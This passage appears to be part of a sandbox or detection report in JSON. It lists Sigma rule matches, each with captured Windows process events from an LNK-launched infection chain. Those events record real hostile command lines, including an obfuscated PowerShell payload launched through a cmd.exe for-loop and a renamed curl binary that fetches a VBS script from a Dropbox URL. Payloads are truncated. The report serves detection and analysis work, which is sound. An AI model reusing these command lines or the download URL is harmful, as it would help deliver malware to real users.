"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e75e9983c2277304aa1294c0b077a3139a8405cd1661ccf513a6c05a002acacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Base64 Encoded PowerShell Command Detected",
"rule_description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "0db9fba426142aca003830de31e38a7318ed0a3a299852f6bc4cbe8bc905515f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Read Contents From Stdin Via Cmd.EXE",
"rule_description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe",
"rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "253df726683ee378cff180cb32526ec9f10b897edda084113b11cbeba118fbe3",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Copy From Or To Admin Share Or Sysvol Folder",
"rule_description": "Detects a copy command or a copy utility execution to or from an Admin share or remote",
"rule_author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a1694413-aae2-452e-af1c-4bddd73debd5",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "77ecce5ea77940e3b7b82f2766d696c4bf16f75a458c3ddfe650f26d4475fa74",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Insecure Transfer Via Curl.EXE",
"rule_description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "a5f575ade1f2aaba452086d3418d8a893e94b28e30da42ad98b58df4a4fe9c2d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Suspicious PowerShell Keywords",
"rule_description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"rule_author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"ScriptBlockId": "a1694413-aae2-452e-af1c-4bddd73debd5",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "c50af4c9fd0606d73bbfb8615f9f4e6ead04b5e20ce70f292af065c18f9e63c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Usage of For Loop with Recursive Directory Search in CMD",
"rule_description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.\n",
"rule_author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=1632C362E1370B79DA529639F63846D50076FD4B,MD5=C30B7264418F9EBE7AE7D8159A894E5E,SHA256=6BD8DF16A6500E279F570E2986D26AD769499933BA2A8911FCF9444A01D3FF30,IMPHASH=2F60C2ED7648C832822B0B1EE9787340",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "MODE.COM",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "DOS Device MODE Utility",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "mode 15,1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\mode.com",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
